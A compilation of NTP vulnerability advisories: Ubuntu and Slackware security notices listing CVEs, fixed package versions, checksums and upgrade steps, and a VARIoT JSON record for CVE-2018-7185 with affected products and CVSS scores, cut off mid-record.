Miroslav Lichvar discovered that NTP incorrectly handled certain spoofed addresses when performing rate limiting. (CVE-2016-7426)
Matthew Van Gundy discovered that NTP incorrectly handled certain crafted broadcast mode packets. (CVE-2016-7427, CVE-2016-7428)
Matthew Van Gundy discovered that NTP incorrectly handled certain control mode packets. A remote attacker could use this issue to set or unset traps. (CVE-2016-9310)
Matthew Van Gundy discovered that NTP incorrectly handled the trap service. (CVE-2016-9311)
It was discovered that the NTP legacy DPTS refclock driver incorrectly handled the /dev/datum device. (CVE-2017-6462)
It was discovered that NTP incorrectly handled certain invalid settings in a :config directive. A remote authenticated user could possibly use this issue to cause NTP to crash, resulting in a denial of service. (CVE-2017-6463)
Michael Macnair discovered that NTP incorrectly handled certain responses. A remote attacker could possibly use this issue to execute arbitrary code. (CVE-2018-7183)
Miroslav Lichvar discovered that NTP incorrectly handled certain zero-origin timestamps. (CVE-2018-7185)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 12.04 ESM: ntp 1:4.2.6.p3+dfsg-1ubuntu3.12
In general, a standard system update will make all the necessary changes.
References: https://usn.ubuntu.com/usn/usn-3707-2 https://usn.ubuntu.com/usn/usn-3707-1 CVE-2016-7426, CVE-2016-7427, CVE-2016-7428, CVE-2016-9310, CVE-2016-9311, CVE-2017-6462, CVE-2017-6463, CVE-2018-7183, CVE-2018-7185 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
[slackware-security] ntp (SSA:2018-060-02)
New ntp packages are available for Slackware 14.0, 14.1, 14.2, and -current to fix security issues.
Here are the details from the Slackware 14.2 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.8p11-i586-1_slack14.2.txz: Upgraded. This release addresses five security issues in ntpd: * LOW/MEDIUM: Sec 3012 / CVE-2016-1549 / VU#961909: Sybil vulnerability: ephemeral association attack. While fixed in ntp-4.2.8p7, there are significant additional protections for this issue in 4.2.8p11. Reported by Matt Van Gundy of Cisco. * INFO/MEDIUM: Sec 3412 / CVE-2018-7182 / VU#961909: ctl_getitem(): buffer read overrun leads to undefined behavior and information leak. Reported by Yihan Lian of Qihoo 360. * LOW: Sec 3415 / CVE-2018-7170 / VU#961909: Multiple authenticated ephemeral associations. Reported on the questions@ list. * LOW: Sec 3453 / CVE-2018-7184 / VU#961909: Interleaved symmetric mode cannot recover from bad state. Reported by Miroslav Lichvar of Red Hat. * LOW/MEDIUM: Sec 3454 / CVE-2018-7185 / VU#961909: Unauthenticated packet can reset authenticated interleaved association. Reported by Miroslav Lichvar of Red Hat. For more information, see: http://support.ntp.org/bin/view/Main/SecurityNotice#February_2018_ntp_4_2_8p11_NTP_S https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7182 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7170 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7184 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7185 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p11-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p11-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.1.txz
Updated package for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/ntp-4.2.8p11-i586-1_slack14.2.txz
Updated package for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.2.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p11-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p11-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 14.0 package: 01c86ddfabec68d52877336258d064c7 ntp-4.2.8p11-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: b2d36d96f9a4d84df3586d38b8b47389 ntp-4.2.8p11-x86_64-1_slack14.0.txz
Slackware 14.1 package: 78b4e9221e725dcb45160950bfc926d0 ntp-4.2.8p11-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: e0d32ed484e02ad28c59838e6407d549 ntp-4.2.8p11-x86_64-1_slack14.1.txz
Slackware 14.2 package: 81690d8e511b403f0fe89c1d120f5049 ntp-4.2.8p11-i586-1_slack14.2.txz
Slackware x86_64 14.2 package: d2c877e3d1b9c7ce003ef090c7610c74 ntp-4.2.8p11-x86_64-1_slack14.2.txz
Slackware -current package: c3ee95d3944b09c2e891883dc5411a6f n/ntp-4.2.8p11-i586-1.txz
Slackware x86_64 -current package: fa9c7a8aca0c769791e34a8e48e6d260 n/ntp-4.2.8p11-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg ntp-4.2.8p11-i586-1_slack14.2.txz
Then, restart the NTP daemon:
sh /etc/rc.d/rc.ntpd restart
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. | +------------------------------------------------------------------------+ -----BEGIN PGP SIGNATURE-----
iEYEARECAAYFAlqYjI8ACgkQakRjwEAQIjM5rACfdDAWRxL2nQATj8HFDPgCVInK 13MAnR04OluKfiEsJVgO6uWJKXy2HOGq =FRx7 -----END PGP SIGNATURE-----
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201803-1822", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "ntp", "scope": "eq", "trust": 1.3, "vendor": "ntp", "version": "4.2.8" }, { "model": "hpux-ntp", "scope": "lt", "trust": 1.0, "vendor": "hpe", "version": "c.4.2.8.4.0" }, { "model": "fujitsu m10-4s", "scope": "lt", "trust": 1.0, "vendor": "oracle", "version": "xcp2361" }, { "model": "diskstation manager", "scope": "gte", "trust": 1.0, "vendor": "synology", "version": "5.2" }, { "model": "fujitsu m10-4", "scope": "lt", "trust": 1.0, "vendor": "oracle", "version": "xcp2361" }, { "model": "skynas", "scope": "lt", "trust": 1.0, "vendor": "synology", "version": "6.1.5-15254" }, { "model": "fujitsu m12-2s", "scope": "lt", "trust": 1.0, "vendor": "oracle", "version": "xcp2361" }, { "model": "fujitsu m12-1", "scope": "lt", "trust": 1.0, "vendor": "oracle", "version": "xcp2361" }, { "model": "fujitsu m12-2", "scope": "lt", "trust": 1.0, "vendor": "oracle", "version": "xcp3070" }, { "model": "ntp", "scope": "lt", "trust": 1.0, "vendor": "ntp", "version": "4.2.8" }, { "model": "router manager", "scope": "lt", "trust": 1.0, "vendor": "synology", "version": "1.1.6-6931-3" }, { "model": "solidfire", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "fujitsu m10-1", "scope": "lt", "trust": 1.0, "vendor": "oracle", "version": "xcp3070" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "16.04" }, { "model": "router manager", "scope": "gte", "trust": 1.0, "vendor": "synology", "version": "1.1" }, { "model": "fujitsu m10-4", "scope": "lt", "trust": 1.0, "vendor": "oracle", "version": "xcp3070" }, { "model": "vs960hd", "scope": "lt", "trust": 1.0, "vendor": "synology", "version": "2.2.3-1505" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "12.04" }, { "model": "fujitsu m10-4s", "scope": "lt", "trust": 1.0, "vendor": "oracle", "version": "xcp3070" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "17.10" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "18.04" }, { "model": "virtual diskstation manager", "scope": "lt", "trust": 1.0, "vendor": "synology", "version": "6.1.6-15266" }, { "model": "fujitsu m12-1", "scope": "lt", "trust": 1.0, "vendor": "oracle", "version": "xcp3070" }, { "model": "fujitsu m12-2s", "scope": "lt", "trust": 1.0, "vendor": "oracle", "version": "xcp3070" }, { "model": "fujitsu m12-2", "scope": "lt", "trust": 1.0, "vendor": "oracle", "version": "xcp2361" }, { "model": "diskstation manager", "scope": "lt", "trust": 1.0, "vendor": "synology", "version": "6.1.6-15266" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "14.04" }, { "model": "hci", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "ntp", "scope": "gte", "trust": 1.0, "vendor": "ntp", "version": "4.2.6" }, { "model": "fujitsu m10-1", "scope": "lt", "trust": 1.0, "vendor": "oracle", "version": "xcp2361" }, { "model": "ntp", "scope": "eq", "trust": 0.9, "vendor": "ntp", "version": "4.2.6" }, { "model": "ntp", "scope": "lt", "trust": 0.8, "vendor": "ntp", "version": "4.2.6 thats all 4.2.8p11" }, { "model": "linux", "scope": null, "trust": 0.8, "vendor": "slackware", "version": null }, { "model": "diskstation manager", "scope": null, "trust": 0.8, "vendor": "synology", "version": null }, { "model": "router manager", "scope": null, "trust": 0.8, "vendor": "synology", "version": null }, { "model": "skynas", "scope": null, "trust": 0.8, "vendor": "synology", "version": null }, { "model": "virtual diskstation manager", "scope": null, "trust": 0.8, "vendor": "synology", "version": null }, { "model": "vs960hd", "scope": null, "trust": 0.8, "vendor": "synology", "version": null }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.3" }, { "model": "4.2.8p9", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p8", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p7", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p6", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p5", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p4", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p3", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p2", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p10", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p1", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p385", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p366", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p22", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p111", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p11", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.4.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.50" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "4.2.8p11", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": null } ], "sources": [ { "db": "BID", "id": "103339" }, { "db": "JVNDB", "id": "JVNDB-2018-002750" }, { "db": "NVD", "id": "CVE-2018-7185" }, { "db": "CNNVD", "id": "CNNVD-201803-141" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.2.8", "versionStartIncluding": "4.2.6", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:synology:diskstation_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "6.1.6-15266", "versionStartIncluding": "5.2", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:synology:router_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.1.6-6931-3", "versionStartIncluding": "1.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:synology:skynas:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "6.1.5-15254", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:synology:virtual_diskstation_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "6.1.6-15266", "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:synology:vs960hd_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.2.3-1505", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:synology:vs960hd:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:netapp:hci:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:hpe:hpux-ntp:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "c.4.2.8.4.0", "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:fujitsu_m10-1_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "xcp2361", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:oracle:fujitsu_m10-1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:fujitsu_m10-4_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "xcp2361", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:oracle:fujitsu_m10-4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:fujitsu_m10-4s_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "xcp2361", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:oracle:fujitsu_m10-4s:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:fujitsu_m12-1_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "xcp2361", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:oracle:fujitsu_m12-1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:fujitsu_m12-2_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "xcp2361", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:oracle:fujitsu_m12-2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:fujitsu_m12-2s_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "xcp2361", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:oracle:fujitsu_m12-2s:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:fujitsu_m10-1_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "xcp3070", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:oracle:fujitsu_m10-1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:fujitsu_m10-4_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "xcp3070", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:oracle:fujitsu_m10-4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:fujitsu_m10-4s_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "xcp3070", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:oracle:fujitsu_m10-4s:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:fujitsu_m12-1_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "xcp3070", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:oracle:fujitsu_m12-1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:fujitsu_m12-2_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "xcp3070", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:oracle:fujitsu_m12-2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:fujitsu_m12-2s_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "xcp3070", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:oracle:fujitsu_m12-2s:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2018-7185" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Miroslav Lichvar of Red Hat.", "sources": [ { "db": "BID", "id": "103339" } ], "trust": 0.3 }, "cve": "CVE-2018-7185", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2018-7185", "impactScore": null, "integrityImpact": 